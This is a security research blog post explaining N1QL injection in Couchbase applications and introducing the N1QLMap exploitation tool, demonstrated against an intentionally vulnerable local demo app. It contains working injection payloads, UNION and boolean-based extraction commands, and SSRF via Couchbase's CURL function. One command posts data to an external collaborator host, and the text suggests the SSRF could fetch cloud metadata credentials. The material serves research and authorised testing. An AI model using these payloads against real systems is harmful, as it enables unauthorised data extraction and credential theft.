N1QL Injection: Kind of SQL Injection in a NoSQL Database

By Krzysztof Pranczk on 2 September, 2020

Krzysztof Pranczk

2 September, 2020

Introduction

Nowadays, databases support various query languages, the most popular being SQL and NoSQL. These query languages are designed to provide clients with an efficient communication interface with the databases. However, in certain circumstances, these interface features can be abused by external attackers or malicious users to extract information. SQL and NoSQL injection attacks tend to dominate the mind when we think of security, and as such, some of the less popular languages are not as well recognised. This publication is focused on the N1QL injection, which can be interpreted as a type of SQL injection in a NoSQL database, and the tool we made to aid exploiting it, N1QLMap! Some of the initial content discussed can also be interpreted as generic for various database queries, however they are included to set the scene and a baseline.

Couchbase Server and N1QL

Couchbase Server (formerly known as Membase, and not to be confused with Apache CouchDB) is an open source NoSQL, document orientated database. The database stores JSON objects as documents, but it can be configured to store non-JSON documents if required. Couchbase Inc. also offer Couchbase Lite and some Mobile products which run on mobile devices (naturally). However these solutions support many of the same features as Couchbase Server.

The Couchbase SDK includes basic functions for Create/Read/Update/Delete (CRUD) operations using document IDs, and queries can be performed using the full-text search feature or against indexes built using MapReduce. In addition to this, more complex queries can also be issued using "Non-First normal Form Query Language" (N1QL - pronounced “nickel”). N1QL is an SQL-like language and is often referred to as “SQL for JSON” and as the name suggests, when applications use this technology insecurely, Injection vulnerabilities start to crop up!

Vulnerable Application

We've provided an intentionally vulnerable application on our git. This application provides a simple API which allows users to search for breweries across the world. The application can be setup via Docker Compose using the following commands:

git clone https://github.com/FSecureLABS/N1QLMap.git
cd n1qlmap/n1ql-demo
./quick_setup.sh

Once set up, the vulnerable application can be located at "http://localhost:3000". For example, the following "curl" command returns a JSON object containing breweries located in New York:

$ curl -G "http://localhost:3000/example-1/breweries" --data-urlencode "city=New York"
...
[
  {
    "beer-sample": {
      "address": [
        "Chelsea Piers, Pier 59"
      ],
      "city": "New York",
      "code": "10011",
      ....

Exploitation #1 – Identify the injection vulnerability

Now we have an application, we need to identify the injection vulnerability! You may have observed already that the application utilises the "city" GET parameter to search for data. So I guess that's as good a place to start as any!

The testing methodology for identifying N1QL injection vulnerabilities is very similar to the widely described SQL Injection testing methodology outlined by OWASP. In its simplest form, the application returns an error code when an apostrophe / quotation mark is included within the SQL query as it breaks the server-side syntax. For example:

$ curl -G "http://localhost:3000/example-1/breweries" --data-urlencode "city='aaa"
...errors\": [{\"code\":3000,\"msg\":\"syntax error - at aaa\"}],\n\"status\": \"fatal\",\n\"...

As seen above, the "syntax error" string suggests that it may be possible to modify the query directly by manipulating a value of the "city" parameter. So far so good. But for all we know this could be any of a broad range of technologies we're injecting into. So next we need to identify the query language and database technology!

Exploitation #2 - Identify the query language and the database

With the suspected query injection point, the next step is to discover the query language. To identify that the injection point is within the N1QL query syntax, specific functions and query constructions can be used. Building a successful query, very specific to N1QL syntax increases the possibility that this language is used on the backend. The following simple methods can be used:

  • Inject "ENCODE_JSON", "META" or other Couchbase database and N1QL specific functions that can be found in the documentation,
  • Inject queries that utilise system keyspaces e.g. "SELECT * FROM system:datastore". More system keyspaces can be found in N1QL Logical Hierarchy

The following URLs are examples of successful queries built using the above methods:

  • http://localhost:3000/example-1/breweries?city=13373' OR ENCODE_JSON({}) == "{}" OR '1'='1
  • http://localhost:3000/example-1/breweries?city=13373' OR ENCODE_JSON((SELECT * FROM system:keyspaces)) != "{}" OR '1'='1
  • http://localhost:3000/example-1/breweries?city=13373' UNION SELECT * FROM system:keyspaces WHERE '1'='1
  • http://localhost:3000/example-1/breweries?city=13373' UNION SELECT META((SELECT * FROM system:datastores)) WHERE '1'='1

If we test the above payloads we will find that none of them return errors, indicating that the modified N1QL queries were processed successfully. As N1QL supports "UNION SELECT" keyword much like regular SQL injection, it is possible to modify the payload to return any data within the HTTP response. For example, to retrieve all available keyspaces from the backend database the following URL could be constructed:

$ curl -G  "http://localhost:3000/example-1/breweries" --data-urlencode "city=' AND '1'='0' UNION SELECT * FROM system:keyspaces WHERE '1'='1"
[{"keyspaces":{"datastore_id":"http://127.0.0.1:8091","id":"beer-sample","name":"beer-sample","namespace_id":"default"}},{"keyspaces":{"datastore_id":"http://127.0.0.1:8091","id":"default-bucket","name":"default-bucket","namespace_id":"default"}},{"keyspaces":{"datastore_id":"http://127.0.0.1:8091","id":"travel-sample","name":"travel-sample","namespace_id":"defa

To make it clearer, the full query built on the backend would be as follows:

SELECT * FROM beer-sample WHERE city='' AND '1'='0' UNION SELECT * FROM system:keyspaces WHERE '1'='1'

Now, we are ready to use the information gained to dare to perform some super exciting data exfiltration!

Exploitation #3 - Data Extraction (Boolean Based Technique)

As we have identified the query language and database technology in use, data extraction simply becomes a combination of the available functions, much like classic SQLi. However, one of the benefits of N1QL is the ability to use the "ENCODE_JSON" function, which returns data in JSON format.

For example, we could extract keyspaces from the database and return it in JSON format using the following query:

$ curl -G "http://localhost:3000/example-1/breweries" --data-urlencode "city=13373' UNION SELECT ENCODE_JSON((SELECT * FROM system:keyspaces ORDER BY id)) WHERE '1'='1"  
[{"$1":"[{\"keyspaces\":{\"datastore_id\":\"http://127.0.0.1:8091\",\"id\":\"beer-sample\",\"name\":\"beer-sample\",\"namespace_id\":\"default\"}},{\"keyspaces\":{\"datastore_id\":\"http://127.0.0.1:8091\",\"id\":\"default-bucket\",\"name\":\"default-bucket\",\"namespace_id\":\"default\"}},{\"keyspaces\":{\"datastore_id\":\"http://127.0.0.1:8091\",\"id\":\"travel-sample\",\"name\":\"travel-sample\",\"namespace_id\":\"default\

A cleaner representation of the most relevant data retrieved is shown below:

[
  {
    "keyspaces": {
      "datastore_id": "http://127.0.0.1:8091",
      "id": "beer-sample",
      "name": "beer-sample",
      "namespace_id": "default"
    }
  },
  {
    "keyspaces": {
      "datastore_id": "http://127.0.0.1:8091",
      "id": "default-bucket",
      "name": "default-bucket",
      "namespace_id": "default"
    }
  },

This type of JSON output makes boolean based data retrieval easy, as we can simply check that the first character of the output is "{", indicating valid JSON. By leveraging this we can create a query that would return results only when a specific character is located at a specific position, and In other cases return empty JSON array. An example of this can be seen below:

curl -G "http://localhost:3000/example-1/breweries" --data-urlencode "city=New York' AND '{' = SUBSTR(ENCODE_JSON((SELECT * FROM system:keyspaces ORDER BY id)), 1, 1) AND '1'='1"
[{"beer-sample":{"address":["Chelsea Piers, Pier 59"],"city":"New York","code":"10011","country":"United States"...

In the above, the "SUBSTR" function is used to extract the first letter from the response, which is being cast to a JSON object using "ENCODE_JSON" function. This value is then compared with the "{" character in an attempt to verify the first character. As this matches, the response is true, and we have successfully enumerated the first character. Using this method, we can check each position for every letter which will allow us to gradually build a JSON document successfully.

By using the "keyspaces" JSON document, a similar technique can also be used to further extract data from keyspaces and perform more advanced queries facilitating addition attacks such as SSRF - we will cover this shortly.

Something to note in the above PoC is that the "ORDER BY" keyword was used within the nested query specifically because Couchbase may return the results in a different order for each query. So by nesting "ORDER BY" we can mitigate this inconsistency.

Alright, that's enough of the fundamentals! During our research, we didn't find any tools that could help us with exploiting N1QL injection due to the specifics of the query language and extraction process. So it was time to put our development hats on and write our own tool!

Automated Data Exfiltration - N1QLMap

At this point, on a few security assessments we found various database query injection issues that turned out to be N1QL injection. During investigation into these issues, we frequently had a search for tooling that could support or automate exploitation. However, none seemed to be found.

In seeing a problem that needed to be solved, we leveraged our existing understanding of the N1QL syntax, its useful features, and knowledge of how similar tools function, and developed N1QLMap as a proof of concept exploitation tool.

Currently, N1QLMap uses boolean based exfiltration techniques and provides users with the following features:

  • lists available datastores;
  • lists system's keyspaces;
  • executes arbitrary N1QL query and obtains results;
  • performs SSRF and obtains results.

At the time of writing this article, N1QLMap is the only tool that seems to provide an effective exploitation mechanism for the N1QL query language. Its features can be used not only for demonstration purposes but also can help in real world scenarios!

As with any good tool, you can set a specific injection point by marking its location using "*i*". An example of this can be seen below, where the injection marker is set within the value of the "city" GET parameter:

GET /example-1/breweries?city=*i* HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache

As N1QLMap uses a raw HTTP requests containing this marker to perform its tasks, the request can be saved to a text file (for example: example_request_1.txt) and passed to N1QLMap within the "--request" parameter. An example of using N1QLMap and this example request to enumerate available datastores is shown by the following command:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --datastores
[{"datastores":{"id":"http://127.0.0.1:8091","url":"http://127.0.0.1:8091"}}

We like to think the parameters for N1QLMap are self-explanatory however, information regarding their use can be found by using the "--help" option. In the above instance, "--keyword" is used to identify when a query was successfully processed.

Now with the datastores in hand, we can further use N1QLMap to extract the related keyspaces:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --keyspaces "http://127.0.0.1:8091"
[{"name":"beer-sample"},{"name":"default-bucket"},{"name":"travel-sample"}]

Similarly, with the keyspaces extracted, we can further enumerate what documents they hold:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --extract travel-sample
[{"O":{"T":{"callsign":"MILE-AIR","country":"United States","iata":"Q5","icao":"MLA","id":10,"name":"40-Mile Air","type":"airline"} [OUTPUT TRUNCATED

The tool also allows users to extract data via arbitrary queries by using the "--query" parameter. However, it should be noted that the "id" parameter of the "META" object should be used in conjunction with this to enforce the order of the returned data. As discussed previously, this will prevent the data order from changing during the extraction process.

An example query to extracts a single document from the "travel-sample" keyspace using an arbitrary query is presented below:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --query 'SELECT * FROM `travel-sample` AS T ORDER by META(T).id L

More commands can be found using "--help" parameter, however for now we'd like to note that the tool currently exists as a proof of concept, and as such some features may require upgrades in next release, or may be integrated with other open source tools. N1QLMap is an open-source project itself, so you can of course contribute to it too if you like!

SSRF Exploitation

So what about this Server-Side Request Forgery (SSRF) we mentioned previously? The Couchbase database supports a "CURL" function which implements a subset of the "Client URL" (cURL) functionality. Through the magic of N1QL, we can actually execute this via a subquery within the "ENCODE_JSON" function described in the previous sections, leading to SSRF.

Now, there is a catch, in that the "CURL" features are restricted by default. However, in some deployments, and within our intentionally vulnerable application, the "CURL" function is enabled and can be used to perform HTTP requests to any URL.

The following N1QLMap command sends an HTTP POST request to a Burp Collaborator server via "CURL" function:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl '*************j3mrt7xy3pre.burpcollaborator.net/endpoint' "{'request':'POST','data':'data','header':['User-Agent: Agent Sm

 The received HTTP request is presented below:

POST /endpoint HTTP/1.1
Host: *************j3mrt7xy3pre.burpcollaborator.net
User-Agent: Agent Smith
Accept: */*
X-N1QL-User-Agent: couchbase/n1ql/2.0.0-N1QL
Content-Length: 4
Content-Type: application/x-www-form-urlencoded
 
data

As shown in the above snippet, it's possible to send arbitrary HTTP POST requests to a given endpoint with arbitrary data. But the fun does not stop there, the "CURL" function also allows us to specify additional options such as HTTP headers, different request method, and the ability to omit certificate validation! So with just a few flags, really we can pretty much send any HTTP request to any URL, which is pretty awesome!

Another nice feature of the N1QLMap tool is that it allows the user to also read data from HTTP response, if they are JSON formatted. An example of this can be seen below, with the following command to obtain information regarding the current weather for Warsaw in Poland:

$ ./n1qlMap.py http://localhost:3000 --request example_request_1.txt --keyword beer-sample --curl 'https://samples.openweathermap.org/data/2.5/weather' "{'request': 'GET', 'data': ['q=Warsaw,pl', 'appid=439d4b804bc8187953eb36d2a8c26a02']}"
[{"O":{"$1":{"base":"stations","clouds":{"all":90},"cod":200,"coord":{"lat":51.51,"lon":-0.13},"dt":1485789600,"id":2643743,"main":{"humidity":81,"pressure":1012,"temp":280.32,"temp_max":281.15,"temp_min":279.15},"name":"London","sys":{"country":"GB","id":5091,"message":0.0103,"sunrise":1485762037,"sunset":1485794875,"type":1},"visibility":10000,"weather":[{"description":"light intensity drizzle","icon":"09d","id":300,"main":"Drizzle"}],"wind":{"deg":80,"speed":

Of course in the above the "samples.openweathermap.org" API is publicly available and just being used as an example. In a legitimate engagement you may use this SSRF to bypass IP restrictions, or extract sensitive information and credentials from metadata endpoint available in cloud environments.

Conclusion

N1QL is becoming more and more common and we made a tool that helped us exploit it on multiple assessments. Hopefully you will find the tool useful too, but if not, feel free to contribute and help make it better!

References and Materials:

N1QL Language Reference
https://docs.couchbase.com/server/6.0/n1ql/n1ql-language-reference

Article “Couchbase and N1QL Security” on Couchbase blog
https://blog.couchbase.com/couchbase-and-n1ql-security-centeredgesoftware/

N1QL Querying System Information
https://docs.couchbase.com/server/6.0/n1ql/n1ql-intro/sysinfo.html

N1QL CheatSheet (pdf)
http://docs.couchbase.com/files/Couchbase-N1QL-CheatSheet.pdf

N1QL Interactive Tutorial
https://query-tutorial.couchbase.com/tutorial

Couchbase REST API Documentation
https://docs.couchbase.com/server/6.0/rest-api

Special credits to Graeme Robinson who initiated this research and Oliver Simonnet for the support.